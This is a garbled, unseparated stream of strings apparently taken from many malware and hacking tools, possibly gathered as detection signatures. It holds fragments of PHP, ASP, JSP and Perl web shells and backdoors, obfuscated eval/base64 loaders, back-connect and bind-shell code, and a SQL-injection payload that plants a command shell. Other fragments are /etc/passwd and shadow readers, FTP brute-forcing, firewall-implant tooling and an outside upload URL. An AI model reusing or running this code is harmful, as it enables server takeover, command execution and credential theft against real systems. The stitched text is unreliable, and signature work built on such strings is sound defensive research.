this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. 
base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
1 email: wfs#encryptpe.com
1 cryptunprotectdatac
1 b.qcrypt version 1.0encrypt and decrypt using rsa cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
1 homepage: www.encryptpe.com
1 k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
1 outlook.exeproblem %s report %sipm.noteip..ip..taskip..stickynoteip..journalip..contactip..appointmentip..imapsysteminfo /fo tabletasklist /vipconfig /allcontent-type: jpegmicrosoft dh schannel cryptographic providerno data%d setime success.m
1 crypt32.dllcryptbinarytostringax;
1 sha-1withrsaencryptionpostal codetls-rsa-with-3des-ede-cbc-shachecking match for '%s' user %s host %s addr %spem_read_bio_privatekey failedusage: %s [-ehr] [-f log_facility] [-l log_level] [-u umask]%s %s for %s%.100s from %.200s port %d%sclapi32.dllconnection from %s port %d/usr/etc/ssh_known_hostsversion: %s - %s %s %s %s[-] connect()/bin/sh /usr/etc/sshrckexecdhs.c%s: setrlimit(rlimit_fsize, { 0, 0 }): %srunfile: couldn't load shell32.dll!runfile: couldn't find shellexecuteexa/w in shell32.dll!e
1 \x00scriptmanc:\\windows\\system32\\sysprep\\cryptbase.dllprobescriptfintprobescriptkids/c ping -n 2 127.0.0.1 & del \"sysscan.exe\"sysscan debug mode!!!this rechecking? (set 0/1 or press enter key)http://37.49.224.144:8189/manual_resultchecker end work!trying send result...bb2fa36aaa9541f0md5=denyip=rmfile=exec_packetbuild_iphdr
1 elfstatus: ok--scryptstratum+tcp://cmd.so/challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sedit_server
1 projectdatadescryptokeepaliveipnetrowlogclientmessage|clienthostget_connectedco$
1 are you alert enough to be using nmap? have some coffee or jolt(tm).shinysoft limited1shinysoft limited0wellington1wainuiomata156 wright st1utn-userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
2 epe: encryptpe v2.2007.12.1, copyright (c) wfs
1 crypto.cipher.aes(mod is null - %sfindnextfile
1 nvsmartmax.dll.urlnv.execryptprotectmemory failedcryptunprotectmemory failedr
1 (polyscrypt
2 pcrypt
1 d$o* encrypted log found. an encryption key must be providedencryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'(
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
(maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. 
php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . 
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? 
$cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? 
/bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . 
$directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' 
color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. 
- sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? 
echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... 
trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' 
<br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = 